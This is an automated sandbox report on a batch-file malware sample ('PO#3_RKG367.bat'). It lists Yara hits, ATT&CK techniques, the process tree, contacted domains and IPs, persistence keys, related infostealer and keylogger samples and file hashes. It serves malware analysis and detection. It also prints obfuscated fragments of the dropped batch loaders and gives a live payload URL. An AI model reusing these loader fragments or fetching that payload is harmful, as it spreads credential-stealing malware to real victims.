                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f75570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.25380000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed4e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.3.rpkhzpuO.pif.2ffbae98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | 22 Scripting | 1 Valid Accounts | 2 Native API | 22 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Valid Accounts | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 2 Software Packing | NTDS | 46 System Information Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Timestomp | LSA Secrets | 351 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 51 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 311 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                      Behavior Graph ID: 1586924  Sample: PO#3_RKG367.bat  Start date: 09/01/2025  Architecture: WINDOWS  Score: 100
                      Behavior graph (process tree, network contacts, dropped files and signatures recovered from the graph text):

                      PO#3_RKG367.bat (start)
                        DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); lwaziacademy.com; 2 other IPs or domains
                        Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 17 other signatures
                        -> cmd.exe
                             Dropped: C:\Users\user\AppData\Local\Temp\x.vbs (ASCII); C:\Users\user\AppData\Local\Temp\x (ASCII)
                             Signatures: Potential malicious VBS script found (has network functionality); Command shell drops VBS files
                             -> x.exe
                                  DNS/IP: lwaziacademy.com 41.185.8.252, 443, 49812, 49813 GridhostZA South Africa
                                  Dropped: C:\Users\Public\Libraries\rpkhzpuO.pif (PE32); C:\Users\Public\Libraries\Oupzhkpr.PIF (PE32); C:\Users\Public\Oupzhkpr.url (MS); 2 other malicious files
                                  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops PE files with a suspicious file extension; 6 other signatures
                                  -> rpkhzpuO.pif
                                       Dropped: C:\Users\user\AppData\...\Trading_AIBot.exe (PE32); C:\Users\user\AppData\...\Microsofts.exe (PE32)
                                       Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
                                       -> Trading_AIBot.exe
                                            Dropped: C:\Users\user\AppData\Roaming\...\apihost.exe (PE32)
                                            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                                            -> powershell.exe (Loading BitLocker PowerShell Module) -> conhost.exe; WmiPrvSE.exe
                                            -> apihost.exe (Antivirus detection for dropped file)
                                            -> schtasks.exe -> conhost.exe
                                       -> Microsofts.exe
                                            DNS/IP: checkip.dyndns.com 158.101.44.242, 49860, 80 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.80.1, 443, 49866 CLOUDFLARENETUS United States
                                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                                  -> cmd.exe -> conhost.exe
                                  -> dllhost.exe
                             -> cscript.exe
                                  Dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
                             -> conhost.exe
                             -> findstr.exe
                        -> Oupzhkpr.PIF
                             Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Allocates many large memory junks
                             -> cmd.exe -> conhost.exe
                             -> rpkhzpuO.pif
                        -> Oupzhkpr.PIF
                             Signatures: Allocates memory in foreign processes; Sample uses process hollowing technique; Sample is not signed and drops a device driver
                             -> cmd.exe -> conhost.exe
                             -> rpkhzpuO.pif

Source | Detection | Scanner | Label
PO#3_RKG367.bat | 24% | ReversingLabs | Script-BAT.Trojan.Malgent
Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Oupzhkpr.PIF | 100% | Avira | HEUR/AGEN.1326019
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | HEUR/AGEN.1326019
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Avira | TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Oupzhkpr.PIF | 47% | ReversingLabs | Win32.Trojan.DBatLoader
C:\Users\Public\Libraries\rpkhzpuO.pif | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 91% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 79% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe | 47% | ReversingLabs | Win32.Trojan.DBatLoader
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
https://lwaziacademy.com/ | 0% | Avira URL Cloud | safe
https://lwaziacademy.com/wps/200_Oupzhkprnvw | 100% | Avira URL Cloud | malware
https://lwaziacademy.com/wps/200 | 0% | Avira URL Cloud | safe
https://lwaziacademy.com:443/wps/200_Oupzhkprnvw | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.80.1 | true | false | | high
lwaziacademy.com | 41.185.8.252 | true | true | | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://lwaziacademy.com/wps/200_Oupzhkprnvw | true | Avira URL Cloud: malware | unknown
http://checkip.dyndns.org/ | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
41.185.8.252 | lwaziacademy.com | South Africa | 36943 | GridhostZA | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1586924
Start date and time: 2025-01-09 19:08:28 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO#3_RKG367.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@42/20@3/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 80%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 249
• Number of non-executed functions: 67
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Trading_AIBot.exe, PID 4064 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 528 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PO#3_RKG367.bat
Time | Type | Description
13:09:46 | API Interceptor | 2x Sleep call for process: x.exe modified
13:09:59 | API Interceptor | 21x Sleep call for process: powershell.exe modified
13:10:05 | API Interceptor | 4x Sleep call for process: Oupzhkpr.PIF modified
13:10:20 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
13:10:43 | API Interceptor | 1971277x Sleep call for process: apihost.exe modified
19:09:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
19:09:59 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
19:10:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
19:10:20 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
41.185.8.252 | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | -
 | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | -
 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | -
 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | -
158.101.44.242 | BgroUcYHpy.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | FORTUNE RICH_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Siparişi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
 | file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
 | Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe | malicious | MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 193.122.130.0
 | dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | İLCİ HOLDİNG a.s fiyati_teklif 017867Siparişi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 132.226.247.73
 | jqxrkk.ps1 | malicious | MassLogger RAT | 132.226.8.169
 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 193.122.130.0
 | Order_List.scr.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
reallyfreegeoip.org | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 104.21.64.1
 | dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | İLCİ HOLDİNG a.s fiyati_teklif 017867Siparişi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 104.21.96.1
 | jqxrkk.ps1 | malicious | MassLogger RAT | 104.21.16.1
 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 104.21.16.1
 | Order_List.scr.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.64.1
 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
lwaziacademy.com | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 104.21.64.1
 | dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | İLCİ HOLDİNG a.s fiyati_teklif 017867Siparişi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 104.21.96.1
 | jqxrkk.ps1 | malicious | MassLogger RAT | 104.21.16.1
 | 0V2JsCrGUB.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
 | https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.html | malicious | Unknown | 1.1.1.1
 | drop1.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
GridhostZA | garm7.elf | malicious | Mirai | 41.61.164.231
 | goarm.elf | malicious | Mirai | 41.61.164.231
 | 3.elf | malicious | Unknown | 41.61.164.255
 | 1.elf | malicious | Unknown | 41.185.108.138
 | 2.elf | malicious | Unknown | 41.185.108.118
 | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 41.185.8.252
 | armv4l.elf | malicious | Mirai | 41.61.6.129
 | 3.elf | malicious | Unknown | 41.185.108.101
ORACLE-BMC-31898US | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 193.122.130.0
 | dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 193.122.130.0
 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | Payment 01.08.25.pdf.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
 | December Reconciliation QuanKang.exe | malicious | Unknown | 193.122.6.168
 | PO.exe | malicious | MassLogger RAT | 193.122.6.168
 | BgroUcYHpy.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | 193.122.130.0
 | ungziped_file.exe | malicious | Snake Keylogger | 193.122.130.0
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 104.21.80.1
 | dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | İLCİ HOLDİNG a.s fiyati_teklif 017867Siparişi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparişi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 104.21.80.1
 | jqxrkk.ps1 | malicious | MassLogger RAT | 104.21.80.1
 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 104.21.80.1
 | Order_List.scr.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.80.1
 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
a0e9f5d64349fb13191bc781f81f42e1 | Invoice.exe | malicious | LummaC | 41.185.8.252
 | 24EPV9vjc5.exe | malicious | Unknown | 41.185.8.252
 | kXzODlqJak.exe | malicious | Unknown | 41.185.8.252
 | 24EPV9vjc5.exe | malicious | Unknown | 41.185.8.252
 | kXzODlqJak.exe | malicious | Unknown | 41.185.8.252
 | cLm7ThwEvh.msi | malicious | Unknown | 41.185.8.252
 | digitalisierungskonzept_muster.js | malicious | Unknown | 41.185.8.252
 | NvOxePa.exe | malicious | LummaC | 41.185.8.252
 | digitalisierungskonzept_muster.js | malicious | Unknown | 41.185.8.252
Match: C:\Users\Public\Libraries\rpkhzpuO.pif
Associated Sample Name / URL | Detection | Threat Name
ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
HSBC_PAY.SCR.exe | malicious | DBatLoader, FormBook
PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 8556
Entropy (8bit): 4.623706637784657
Encrypted: false
SSDEEP: 192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5: 60CD0BE570DECD49E4798554639A05AE
SHA1: BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256: CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512: AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious: true
Preview: @echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category: dropped
Size (bytes): 46543
Entropy (8bit): 4.705001079878445
Encrypted: false
SSDEEP: 768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5: 637A66953F03B084808934ED7DF7192F
SHA1: D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256: 41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512: 2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious: false
Preview: @echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: data
Category: dropped
Size (bytes): 679957
Entropy (8bit): 7.4483963454083435
Encrypted: false
SSDEEP: 12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
MD5: 25A482D7B6698E7666A523C910799F13
SHA1: 18B17A1E14069E747F5076F97A9654D8D99E5ADA
SHA-256: 4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
SHA-512: 5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
Malicious: true
Preview: ...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1317376
Entropy (8bit): 6.092693903786427
Encrypted: false
SSDEEP: 24576:hULl20LaVZ0emwYGqo1FJ89BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBx:hU1X1orJEBBBBBBBBBBBBBBBBBBBBBBB
MD5: E337ECD5680D121D6DD649956DC716CA
SHA1: 198EAA7905760AA3FEE7D7329EC6354096C6BA63
SHA-256: 80AF0DDC803BB3CD14029CD9CEE39D81B15B21FC126912EFBDD7824BA740669B
SHA-512: 75783A2850F451E4733F7CFBBF1A9451041C040BB64B7DF7AA19ABE2FFFDDF45291C4706C5F606EE6AD168779B25C0D88DE2481FC563DAB1531BFD907CC20C92
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 47%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................2%...........................P...a...........................@.......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata..2%.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc...a...P...b..................@..B.rsrc................2..............@..@....................................@..@................................................................................................

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 175800
Entropy (8bit): 6.631791793070417
Encrypted: false
